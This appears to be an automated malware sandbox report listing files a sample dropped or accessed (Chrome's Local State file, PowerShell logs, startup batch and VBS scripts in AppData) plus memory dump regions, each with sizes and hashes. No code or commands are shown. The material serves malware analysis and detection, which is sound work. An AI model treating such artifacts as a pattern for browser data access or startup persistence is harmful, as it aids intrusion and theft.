2fef87c0a1d7c11e5088eee133cd044a7c33d2f4aaead679835f3c5ca001b0db4fff78796f66b76217e7e96ca7cab2db62b07de6701507e91c17873169c5daf6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
c6ee1c45c2e82ff5b1bb7383b89574c7

SHA1
e721107d80d25bcf1ca4502e981fb7e324b89f31

SHA256
292ca31823ae50b9cebc34b6efd5f44cbca3e9a4f2b0fcd95e76c057201b5936

SHA512
bee7e747cb1e9fcd9294b3885e7ad3b7c9c7d0036d60c4d57688a9327bca3d6eb03c942d4da5f2547d7be303e8793baab389d0f3cee0ae987e0311d64b2b04a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
051267d3cc118dc90b008b67992cf6fb

SHA1
81f46a77c3a9558f0a6fa513937b688d9d137673

SHA256
b0a0ca05c984da06a04340e0bdd3803d7b08d02e10aa6c79adf5f31b0a4e0b3a

SHA512
1eeb6dfa10d043af8b41da01296dfaedb62f014fc91adfd9d4033199dc1e5d86f5fe229dbf9be3e90825cc1c8cfe20a45a2e144e1a3f24dab52aa0c72e442c48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dbb22d95851b93abf2afe8fb96a8e544

SHA1
920ec5fdb323537bcf78f7e29a4fc274e657f7a4

SHA256
e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

SHA512
16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bbc2b43d5e574fe7d193c6fc0eb7302c

SHA1
f22683b94ad593fd0513fef37df1fb5d0880cc22

SHA256
0efa2469ae0b02af024fd0e2828ccab085eaefef3736b3bda0ba631e3a45aa48

SHA512
287449b168297a5176b26777f2f5ca3284d967b93274db8b3029d130049073560a10e418607f670d08194193aa91fc9cd174717e7c1d051b09c23857fe3ab9d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae7bf0610265f0426afb299208336b9a

SHA1
dc77dbadc25b84bb9920c04faa12bb5f5ed629e9

SHA256
918c14f006c3d1dc0f61e037db81f2e51a1f02a0c3a0534713a79740ac3434cc

SHA512
dd9ca2bf93e5d8978618132f717ed2b96fef328495564a65fb7688acef0605f3060c57752ea653ac8c2116a75c6c3913976d420a93772bbebbc1e96ad19055e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8ec98e3a156787aab5f79cbebdc632fc

SHA1
16ac82aca7ef17ec2b42a125c35b035b994ee81a

SHA256
060218f00604ffb11caa965f998ee2024c0e10d9efd2a9d1044f80e634bc2e5f

SHA512
0de87ae62caf6d280f2b1aa4ace995437c714be91b529b6671909e979c2f56a6c8f0b127892931e3ca319d1a848844f3b5f8a210239b108feb95efe9915678ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yd3i3pxj.yd1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_934.bat

Filesize
422KB

MD5
e87e3e968e80526bc362bfdd1e4bf266

SHA1
4fee6fa14c33b6de899cfd3cd9dc8fc9de2a1a7c

SHA256
e5f8aa6ad4a268a2d8d5a7bf151dd9df36cf5a9fdcd76ee1bcfc357a245c3d2e

SHA512
edd5bbcc9b42ff5535fc65adc28277255deffeaa7c1d8b4d4e0599a1d9df15f700a30a052ae991069f9bd3d2b9eede700fd202b282ebc8358c75d9175cfc8abd

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_934.vbs

Filesize
115B

MD5
5db8098218698ce955372256a270dff6

SHA1
bb0c1098a19f5d55bcbff618f886ce23571b215a

SHA256
8552f2ca7b505c3917e446ee0690564314f2801e945f4f901e7f0509e6fc3070

SHA512
7de1f5e566c709f2295689760e03f6133fe681f7f8649bb51174351f3a2c802f1e541265eb4495beae67f5bf7c1774f0012aed2279cf3da056f68b17107ebd0b

Download Submit
\??\pipe\crashpad_3272_CUAWULBNCGKQLXRB

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/872-27-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/872-88-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/872-17-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/872-31-0x000002069E3C0000-0x000002069E42E000-memory.dmp

Filesize
440KB

Download
memory/872-30-0x0000020686370000-0x0000020686378000-memory.dmp

Filesize
32KB

Download
memory/872-28-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/1220-0-0x00007FFF98773000-0x00007FFF98775000-memory.dmp

Filesize
8KB

Download
memory/1220-15-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/1220-12-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/1220-11-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

Filesize
10.8MB

Download
memory/1220-7-0x0000015DFEA60000-0x0000015DFEA82000-memory.dmp

Filesize
136KB

Download
memory/1992-73-0x00000294B9CE0000-0x00000294B9D14000-memory.dmp

Filesize
208KB

Download